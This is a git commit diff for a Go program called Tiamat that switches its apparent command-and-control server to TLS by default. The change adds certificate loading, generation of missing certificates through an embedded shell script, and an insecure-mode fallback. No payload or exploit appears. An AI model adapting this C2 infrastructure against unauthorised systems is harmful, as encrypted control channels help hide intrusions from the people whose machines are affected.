Use TLS encryption by default
This commit is contained in:
parent
149c0bcecc
commit
62c28005a8
|
|
@ -43,6 +43,7 @@ func initConfig() {
|
||||||
|
|
||||||
// Search config in home directory with name ".tune" (without extension).
|
// Search config in home directory with name ".tune" (without extension).
|
||||||
viper.AddConfigPath(home + "/.config/tiamat")
|
viper.AddConfigPath(home + "/.config/tiamat")
|
||||||
|
configDir = home + "/.config/tiamat"
|
||||||
viper.SetConfigType("toml")
|
viper.SetConfigType("toml")
|
||||||
viper.SetConfigName("tiamat")
|
viper.SetConfigName("tiamat")
|
||||||
}
|
}
|
||||||
|
|
|
||||||
|
|
@ -9,7 +9,6 @@ import (
|
||||||
"log"
|
"log"
|
||||||
)
|
)
|
||||||
|
|
||||||
// serverCmd represents the server command
|
|
||||||
var serverCmd = &cobra.Command{
|
var serverCmd = &cobra.Command{
|
||||||
Use: "server",
|
Use: "server",
|
||||||
Short: "Tiamat Server",
|
Short: "Tiamat Server",
|
||||||
|
|
|
||||||
|
|
@ -1,6 +1,8 @@
|
||||||
package cmd
|
package cmd
|
||||||
|
|
||||||
import (
|
import (
|
||||||
|
"crypto/tls"
|
||||||
|
_ "embed"
|
||||||
"encoding/gob"
|
"encoding/gob"
|
||||||
"encoding/json"
|
"encoding/json"
|
||||||
"fmt"
|
"fmt"
|
||||||
|
|
@ -9,12 +11,16 @@ import (
|
||||||
"mime/multipart"
|
"mime/multipart"
|
||||||
"net"
|
"net"
|
||||||
"os"
|
"os"
|
||||||
|
"os/exec"
|
||||||
|
"strings"
|
||||||
"time"
|
"time"
|
||||||
|
|
||||||
"github.com/spf13/viper"
|
"github.com/spf13/viper"
|
||||||
)
|
)
|
||||||
|
|
||||||
var (
|
var (
|
||||||
|
configDir string
|
||||||
|
|
||||||
C2Port string = "1302"
|
C2Port string = "1302"
|
||||||
clientList []Client
|
clientList []Client
|
||||||
clientIDs int = 0
|
clientIDs int = 0
|
||||||
|
|
@ -22,11 +28,15 @@ var (
|
||||||
heartbeatRate time.Duration = 15
|
heartbeatRate time.Duration = 15
|
||||||
|
|
||||||
servInsecure bool
|
servInsecure bool
|
||||||
|
servCert string
|
||||||
|
|
||||||
isUsingJSONParameter bool
|
isUsingJSONParameter bool
|
||||||
clientJSONPath string = "/.config/tiamat/clients.json"
|
clientJSONPath string = "/.config/tiamat/clients.json"
|
||||||
)
|
)
|
||||||
|
|
||||||
|
//go:embed gen-cert.sh
|
||||||
|
var script string
|
||||||
|
|
||||||
func (c Client) Instruct(i Instructions) error {
|
func (c Client) Instruct(i Instructions) error {
|
||||||
enc := gob.NewEncoder(c.Conn)
|
enc := gob.NewEncoder(c.Conn)
|
||||||
err := enc.Encode(i)
|
err := enc.Encode(i)
|
||||||
|
|
@ -36,6 +46,37 @@ func (c Client) Instruct(i Instructions) error {
|
||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func createCerts() {
|
||||||
|
log.Println("[-] Certificates don't exist! Creating them...")
|
||||||
|
c := exec.Command("bash")
|
||||||
|
c.Stdin = strings.NewReader(script)
|
||||||
|
b, err := c.Output()
|
||||||
|
if err != nil {
|
||||||
|
log.Fatalf("Error occurred creating certificates: %v\n", err)
|
||||||
|
}
|
||||||
|
fmt.Print(string(b))
|
||||||
|
}
|
||||||
|
|
||||||
|
func startInsecureServer() (net.Listener, error) {
|
||||||
|
ln, err := net.Listen("tcp", ":"+C2Port)
|
||||||
|
return ln, err
|
||||||
|
}
|
||||||
|
|
||||||
|
func startSecureServer() (net.Listener, error) {
|
||||||
|
cer, err := tls.LoadX509KeyPair(configDir+"/server.crt", configDir+"/server.key")
|
||||||
|
|
||||||
|
if os.IsNotExist(err) {
|
||||||
|
createCerts()
|
||||||
|
cer, err = tls.LoadX509KeyPair(configDir+"/server.crt", configDir+"/server.key")
|
||||||
|
}
|
||||||
|
if err != nil {
|
||||||
|
log.Fatalf("Error happened loading certificates: %v\n", err)
|
||||||
|
}
|
||||||
|
config := &tls.Config{Certificates: []tls.Certificate{cer}}
|
||||||
|
ln, err := tls.Listen("tcp", ":"+C2Port, config)
|
||||||
|
return ln, err
|
||||||
|
}
|
||||||
|
|
||||||
func setClientPath() (string, error) {
|
func setClientPath() (string, error) {
|
||||||
var fileToOpen string
|
var fileToOpen string
|
||||||
home, err := os.UserHomeDir()
|
home, err := os.UserHomeDir()
|
||||||
|
|
@ -97,7 +138,15 @@ func Server() {
|
||||||
log.Fatalf("Error happened recovering clients: %v\n", err)
|
log.Fatalf("Error happened recovering clients: %v\n", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
ln, err := net.Listen("tcp", ":"+C2Port)
|
//ln, err := net.Listen("tcp", ":"+C2Port)
|
||||||
|
var ln net.Listener
|
||||||
|
var err error
|
||||||
|
if servInsecure == true {
|
||||||
|
log.Println("WARNING: Starting unencrypted server!")
|
||||||
|
ln, err = startInsecureServer()
|
||||||
|
} else {
|
||||||
|
ln, err = startSecureServer()
|
||||||
|
}
|
||||||
if err != nil {
|
if err != nil {
|
||||||
log.Fatalf("Error happened listening on C2 port: %v\n", err)
|
log.Fatalf("Error happened listening on C2 port: %v\n", err)
|
||||||
}
|
}
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue